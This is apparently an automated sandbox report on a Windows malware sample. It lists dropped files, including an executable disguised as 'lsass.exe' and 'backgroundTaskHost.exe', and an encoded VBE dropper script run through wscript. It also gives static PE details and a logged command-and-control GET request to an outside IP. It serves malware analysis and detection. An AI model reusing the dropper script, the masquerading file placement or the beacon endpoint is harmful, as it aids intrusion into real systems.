                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\refhostperfdllCommonsessionnetsvc.exe.log
                Process:C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
                File Type:ASCII text, with CRLF line terminators
                Category:modified
                Size (bytes):1740
                Entropy (8bit):5.360872475306136
                Encrypted:false
                SSDEEP:48:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1hAHKKP5H+RHKl:iqnwmI0qerYqGgAoPtzG1eqKP5gql
                MD5:7AC9E3ED5E1926DAE60D44553AFE67FE
                SHA1:1EC2BB13633A3C21E2F3206696D89876B15E160F
                SHA-256:97BCE2B4536F07A3269FCCA71C9768C9D516D065BE0E538B17BADB90C32A6554
                SHA-512:D8070849646B1E8967C713800098073E68B0FF5EAB55E06A32E0C365A6D49E5FB1718340459B4710B4A8DC6CDE8EA1345F7935CD0C7E27A18BEF71B8309A5B27
                Malicious:false
                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wjIuhVBtfHXnMCZlWDoj.exe.log
                Process:C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1281
                Entropy (8bit):5.367899416177239
                Encrypted:false
                SSDEEP:24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1Q
                MD5:7115A3215A4C22EF20AB9AF4160EE8F5
                SHA1:A4CAB34355971C1FBAABECEFA91458C4936F2C24
                SHA-256:A4A689E8149166591F94A8C84E99BE744992B9E80BDB7A0713453EB6C59BBBB2
                SHA-512:2CEF2BCD284265B147ABF300A4D26AD1AAC743EFE0B47A394FB614B6843A60B9F918E56261A56334078D0D9681132F3403FB734EE66E1915CF76F29411D5CE20
                Malicious:false
                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                C:\Users\user\Pictures\Camera Roll\6203df4a6bafc7
                Process:C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
                File Type:ASCII text, with very long lines, with no line terminators
                Category:dropped
                Size (bytes):675
                Entropy (8bit):5.891310729251569
                Encrypted:false
                SSDEEP:12:DOB1NmPsK15+T3g1O/ezt7yXH9CVQ8pLfLL/0rEPPzPcsVtEPvu2:SDQPj15+T34WeakzL/0IPPzksV8u2
                MD5:B026BC253DC1C8E4F743CD7CD6016E40
                SHA1:C8519D92F0ACDAE6CB9A29DF8CC89AEBDFF7CC22
                SHA-256:B7FC66800295ED68EA4045E6A3F88ECC9C47F4E8FF1B3412EA4F1DFD5FC8BA37
                SHA-512:EB8CE932671F72BC86B358E5EC159276FD78B0360E5007CDEE021C5A9560CADDCA7065C90B4AEA349414F61BC01038319B760D132CAFA38C3E155BDF9E9136A9
                Malicious:false
                Preview: HvqAOYFognqiIZxrZOvyCLkyJ8sVjS9rdIG5goRISt4oQfGjR3ObnJm5K11QqtENn9FAS2Kv6nfTQ6hn2IEqEiDTfLuowAcjorBRaGRZsdeAnToOUOYhoXJF5veHHf85L6pj4QMw1p8kEDqMggUim54Qh5VplJRMeizqoFTEBmp8ZiA1ERkkLaTPCYC84hKsXwFfO9ibMQgAP5185ekUjrBEPjoPDUJeb7kncenFsIY43S9GgDDa7zIquBQpVSY2HCiSVOfa1flaTGL6jis9Qtgmy42bO7tZufx1trvShnjcNsXn0TGxjYlXf6eaWEL3vLqxTTN2xacnKEYGgOl416zV4ZVxMU6dbpqCCkUgGNAJ68MahY4HcRBzVU238Zpcd9LeYWE63Fxn5qY6N5PyayAKn1qrrairihp7xrCLU7OWdY3p56qCK1Cp8A1gpWPdhGFYAbJf2DedknrP7BvvufgreA8w0fg7ruzWTfoewLKGWjEUTmjolesCkX3AcWoXhhvzyU5cWQ8iUaU55odO61VNCww5moBZgwizyPg8qHSUfKrJD8Fy3abqLhxBi90sPiCi1eGqHfhyjBr2Fm2ojNgGV2oQbeZqRjF7HJSi1ZqX2mGKz555HMJBC5M800OmF0h95uu6UUwKgINtweagidjFaD5M6UrBKDS
                C:\Users\user\Pictures\Camera Roll\lsass.exe
                Process:C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1005056
                Entropy (8bit):6.304363811100068
                Encrypted:false
                SSDEEP:12288:RrC9hUiTQ4XmycIJ83QYQzC76HKtkzWkeQwwcwFWnP4q65Iqn4:ChHlmyb8uonlHQwhn/r+4
                MD5:4E66AE5C311A1AADC1241790C112525F
                SHA1:0E697DE0A696E498897118D193E4EBC854EAD1E2
                SHA-256:08D8DB67DDAE643CE598DC41C4BF56156079461A79CDB2BDB5783EB6FD804B51
                SHA-512:E10C940EB260F9B1BC305A7B0AABA7760806B4712500223D3B9920F800546B44A02D11CE9A16DA17CABD5C986C68F535CD27387A8BD4F01929061FEDFFE6B5B9
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....].a.....................Z......n.... ... ....@.. ....................................@................................. ...K....... ............................................................................ ............... ..H............text...t.... ...................... ..`.sdata...R... ...T..................@....rsrc... ............P..............@..@.reloc...............T..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe
                Process:C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1005056
                Entropy (8bit):6.304363811100068
                Encrypted:false
                SSDEEP:12288:RrC9hUiTQ4XmycIJ83QYQzC76HKtkzWkeQwwcwFWnP4q65Iqn4:ChHlmyb8uonlHQwhn/r+4
                MD5:4E66AE5C311A1AADC1241790C112525F
                SHA1:0E697DE0A696E498897118D193E4EBC854EAD1E2
                SHA-256:08D8DB67DDAE643CE598DC41C4BF56156079461A79CDB2BDB5783EB6FD804B51
                SHA-512:E10C940EB260F9B1BC305A7B0AABA7760806B4712500223D3B9920F800546B44A02D11CE9A16DA17CABD5C986C68F535CD27387A8BD4F01929061FEDFFE6B5B9
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....].a.....................Z......n.... ... ....@.. ....................................@................................. ...K....... ............................................................................ ............... ..H............text...t.... ...................... ..`.sdata...R... ...T..................@....rsrc... ............P..............@..@.reloc...............T..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Windows\System32\umdmxfrm\eddb19405b7ce1
                Process:C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
                File Type:ASCII text, with very long lines, with no line terminators
                Category:dropped
                Size (bytes):669
                Entropy (8bit):5.898005341738037
                Encrypted:false
                SSDEEP:12:DBYJ1n7P/N5PX3OB3f/TaTFYNejCf8SfSiiJfmVC75kKWrFW4gsFWbpy8ZxNG:6J1n7t5P83zaTUfxf/iJS3rw4gs58ZHG
                MD5:C4F153DB69F9163AE21EE298A7A17987
                SHA1:D67E6B1131FBEEE20B1B50FB4DEA50323E113497
                SHA-256:88080CAE6BB969A00918DA20FE8EEE690E508406E002AF17DF3E763F693D3592
                SHA-512:E66F992F8633B533D8B6FDFB90F4CC0E69860B1E136356C1276C1CCE0E497BF4856D56F3F5A25F826921A3E9FF98511444B9BFB6E7E178A5E1D1F52D2CFF1929
                Malicious:false
                Preview: OQMktyBujuHUaW9uDSN9x3rAb7Km60gU7SRvKf1S58QINDRkTlFgUz2VjLJwoZytOxXHEOkia4DzmixXpjSUv9AIa6M9VFngKh4ZqKfFBgGZvCsAXvGFGd8OxOrIBkMURhoEoYrfENSO3kXXOLmj9iZqjplbcXDbTvINYnW8ElA3LtVM1T408mVsI8f8xPCrK14HcJ9kznfYhgfzUYjIdMcqaZFZIXLyiTsUyNtsUTBVH7KmdqnYp3N7YOrDDjbbcqzOxLAHo1yJLHjdPd6ctwJoFv5kfqou2j2aH5ySpgtyFEvRoOxkn9rphLIBPZm7MDRlOIVToowNCUjA9o6R3DH22N36xxCP4wlBxKCg2d68MenMlHCldUEJ5YtBOZg1lhTQthNzmZYZHJqXjqUpubwjrcGZaARc7FXpLWdE4N9D6oBwrVbhF0GKvtiQbxYlI5cCvBMNNQvhcsmCaTrEitXG8N4bxMnGyX5AM9AqJOUyFirCGg0HFTCYhVDiGuZBnotExm0bSB4UZjBZf1URWfAeVgd05cjZySLbznPepYyEZs98UoDPZIpHnOtQJ9f0bffGXkk1m0l7r6FmgegRYU9qnExk48Vq37n3M3luDLmjgrZrJGuocObGfycSw97ne5EuSLan3wNNraK6pGayOrNofhXXb
                C:\refhostperfdllCommon\mbuli7h5qN.vbe
                Process:C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
                File Type:data
                Category:dropped
                Size (bytes):203
                Entropy (8bit):5.773879727999392
                Encrypted:false
                SSDEEP:6:GFt2wqK+NkLzWbHK/818nZNDd3RL1wQJR80zSQbs:GFt7MCzWLKG4d3XBJ20+R
                MD5:757B50FD5D788BA7E256A3E77451C547
                SHA1:1FCBE9134894A2332A01ADF3AD8A81E568280DEC
                SHA-256:BCBB7284A180E1EF6153FAFADBD097F3A0D11B52DB126B0C2825D5151EC6A551
                SHA-512:A31A7D22B39F636F59D8755D18E84FF4F900A7B7505F711658528876E4D7E9655774FBCA15E4861FDB2479F7BDA5575FB24476CAEF76B4187E56D0A74371C01D
                Malicious:false
                Preview: #@~^sgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJDn6tK/Ya+MWN^V/Ws:GUJD?ofXaR4mOE~,!BPWlsd.IzkAAA==^#~@.
                C:\refhostperfdllCommon\rSX3yp.bat
                Process:C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):63
                Entropy (8bit):4.093612709800596
                Encrypted:false
                SSDEEP:3:I5QDVqXD/l2ARKWqXD/lcWWTTbAH:IO0N0NnyAH
                MD5:C6324E617643334D666C56C7C5512F67
                SHA1:EB4ED012A1147A1B3B464E88FB7ABA700C73EAD2
                SHA-256:38D60AD4DB38391E6FAEEE019BEFA3D2F72BE82B212244671354BD9BFBD372EE
                SHA-512:7FC8A7AE91396CDBB270E69B25ED50DF1B7178B6B5EE1042BB6CFA3BABE1599113A64B3BDE10DDA8DFA2B9A537FE17F527989730F9E9ECB1A0E45B74F5DB642F
                Malicious:false
                Preview: "C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe"
                C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
                Process:C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1005056
                Entropy (8bit):6.304363811100068
                Encrypted:false
                SSDEEP:12288:RrC9hUiTQ4XmycIJ83QYQzC76HKtkzWkeQwwcwFWnP4q65Iqn4:ChHlmyb8uonlHQwhn/r+4
                MD5:4E66AE5C311A1AADC1241790C112525F
                SHA1:0E697DE0A696E498897118D193E4EBC854EAD1E2
                SHA-256:08D8DB67DDAE643CE598DC41C4BF56156079461A79CDB2BDB5783EB6FD804B51
                SHA-512:E10C940EB260F9B1BC305A7B0AABA7760806B4712500223D3B9920F800546B44A02D11CE9A16DA17CABD5C986C68F535CD27387A8BD4F01929061FEDFFE6B5B9
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....].a.....................Z......n.... ... ....@.. ....................................@................................. ...K....... ............................................................................ ............... ..H............text...t.... ...................... ..`.sdata...R... ...T..................@....rsrc... ............P..............@..@.reloc...............T..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.496971119283181
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                • Win32 Executable (generic) a (10002005/4) 49.97%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
                File size:1322142
                MD5:a4d367f98a1fa3e594af0875379bda39
                SHA1:a82d6bafcc260138eb11b4a511ff6f3e80441ce3
                SHA256:9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b8f3040eb8f3d29ef149
                SHA512:94deb8455db4863909dfccb33f7ceb128ff6a041c6e36d04d679df74fa0506443466ada3f3c13352d665e54d0440b2f086a8a599e7db914bc5e54df08f6ba547
                SSDEEP:24576:U2G/nvxW3Ww0tbhHlmyb8uonlHQwhn/r+47:UbA30dH36+yn/a4
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

                File Icon

                Icon Hash:d49494d6c88ecec2

                Static PE Info

                General

                Entrypoint:0x41ec40
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                DLL Characteristics:GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

                Entrypoint Preview

                Instruction
                call 00007F06A04913D9h
                jmp 00007F06A0490DEDh
                cmp ecx, dword ptr [0043E668h]
                jne 00007F06A0490F65h
                ret
                jmp 00007F06A049155Eh
                int3
                int3
                int3
                int3
                int3
                push ebp
                mov ebp, esp
                push esi
                push dword ptr [ebp+08h]
                mov esi, ecx
                call 00007F06A0483CF7h
                mov dword ptr [esi], 00435580h
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                and dword ptr [ecx+04h], 00000000h
                mov eax, ecx
                and dword ptr [ecx+08h], 00000000h
                mov dword ptr [ecx+04h], 00435588h
                mov dword ptr [ecx], 00435580h
                ret
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                lea eax, dword ptr [ecx+04h]
                mov dword ptr [ecx], 00435568h
                push eax
                call 00007F06A04940FDh
                pop ecx
                ret
                push ebp
                mov ebp, esp
                sub esp, 0Ch
                lea ecx, dword ptr [ebp-0Ch]
                call 00007F06A0483C8Eh
                push 0043B704h
                lea eax, dword ptr [ebp-0Ch]
                push eax
                call 00007F06A0493812h
                int3
                push ebp
                mov ebp, esp
                sub esp, 0Ch
                lea ecx, dword ptr [ebp-0Ch]
                call 00007F06A0490F04h
                push 0043B91Ch
                lea eax, dword ptr [ebp-0Ch]
                push eax
                call 00007F06A04937F5h
                int3
                jmp 00007F06A0495843h
                jmp dword ptr [00433260h]
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                push 00421EB0h
                push dword ptr fs:[00000000h]

                Rich Headers

                Programming Language:
                • [ C ] VS2008 SP1 build 30729
                • [EXP] VS2015 UPD3.1 build 24215
                • [LNK] VS2015 UPD3.1 build 24215
                • [IMP] VS2008 SP1 build 30729
                • [C++] VS2015 UPD3.1 build 24215
                • [RES] VS2015 UPD3 build 24213

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
                IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000xdfd0.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x2268.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x310ea0x31200False0.583959526081data6.70807539634IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .rdata0x330000xa6120xa800False0.452845982143data5.22174270925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x3e0000x237280x1000False0.36767578125data3.70881866699IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .didat0x620000x1880x200False0.4453125data3.2982538068IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .rsrc0x630000xdfd00xe000False0.637032645089data6.63675064042IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x710000x22680x2400False0.768120659722data6.55486201017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                PNG0x636500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States
                PNG0x641980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States
                RT_ICON0x657480x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                RT_ICON0x65cb00x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                RT_ICON0x665580xea8dataEnglishUnited States
                RT_ICON0x674000x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                RT_ICON0x678680x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
                RT_ICON0x689100x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                RT_ICON0x6aeb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                RT_DIALOG0x6f5880x286dataEnglishUnited States
                RT_DIALOG0x6f3580x13adataEnglishUnited States
                RT_DIALOG0x6f4980xecdataEnglishUnited States
                RT_DIALOG0x6f2280x12edataEnglishUnited States
                RT_DIALOG0x6eef00x338dataEnglishUnited States
                RT_DIALOG0x6ec980x252dataEnglishUnited States
                RT_STRING0x6ff680x1e2dataEnglishUnited States
                RT_STRING0x701500x1ccdataEnglishUnited States
                RT_STRING0x703200x1b8dataEnglishUnited States
                RT_STRING0x704d80x146Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500EnglishUnited States
                RT_STRING0x706200x446dataEnglishUnited States
                RT_STRING0x70a680x166dataEnglishUnited States
                RT_STRING0x70bd00x152dataEnglishUnited States
                RT_STRING0x70d280x10adataEnglishUnited States
                RT_STRING0x70e380xbcdataEnglishUnited States
                RT_STRING0x70ef80xd6dataEnglishUnited States
                RT_GROUP_ICON0x6ec300x68dataEnglishUnited States
                RT_MANIFEST0x6f8100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                Imports

                DLLImport
                KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jan 14, 2022 19:15:28.995527983 CET4978080192.168.2.447.254.235.229
                Jan 14, 2022 19:15:29.257647991 CET804978047.254.235.229192.168.2.4
                Jan 14, 2022 19:15:29.259288073 CET4978080192.168.2.447.254.235.229
                Jan 14, 2022 19:15:29.795423985 CET4978080192.168.2.447.254.235.229
                Jan 14, 2022 19:15:30.061341047 CET804978047.254.235.229192.168.2.4

                HTTP Request Dependency Graph

                • 47.254.235.229

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.44978047.254.235.22980C:\Users\user\Pictures\Camera Roll\lsass.exe
                TimestampkBytes transferredDirectionData
                Jan 14, 2022 19:15:29.795423985 CET1519OUTGET /7/Universal/HttpFlower1Track/BigloadpacketCdn/localSecure/eternalPipebigloadsqldownloads.php?8QZesf4BjPtJwMxRC1=1cEHj6AVuwEa1lJXnITm&E9EC=WXKg&p6jKF4I=isJKPez2imzKItPhxc9FejmLNj&ad86a6d64cd9a9c991d6459f2f76c879=2c265b3bebbb4f72fb0a4abcd42fd52d&7ff5ed2a3db2907b96c3c5c975e1934b=wYiFDMykTM1ATZzUGZhVGN2cjYlFmM0YzNwEGMjNGMiRzYhJDZ1IzM&8QZesf4BjPtJwMxRC1=1cEHj6AVuwEa1lJXnITm&E9EC=WXKg&p6jKF4I=isJKPez2imzKItPhxc9FejmLNj HTTP/1.1
                Accept: */*
                Content-Type: text/css
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                Host: 47.254.235.229
                Connection: Keep-Alive


                Code Manipulations

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:19:14:34
                Start date:14/01/2022
                Path:C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe"
                Imagebase:0x1000000
                File size:1322142 bytes
                MD5 hash:A4D367F98A1FA3E594AF0875379BDA39
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                General

                Start time:19:14:36
                Start date:14/01/2022
                Path:C:\Windows\SysWOW64\wscript.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\WScript.exe" "C:\refhostperfdllCommon\mbuli7h5qN.vbe"
                Imagebase:0x10000
                File size:147456 bytes
                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
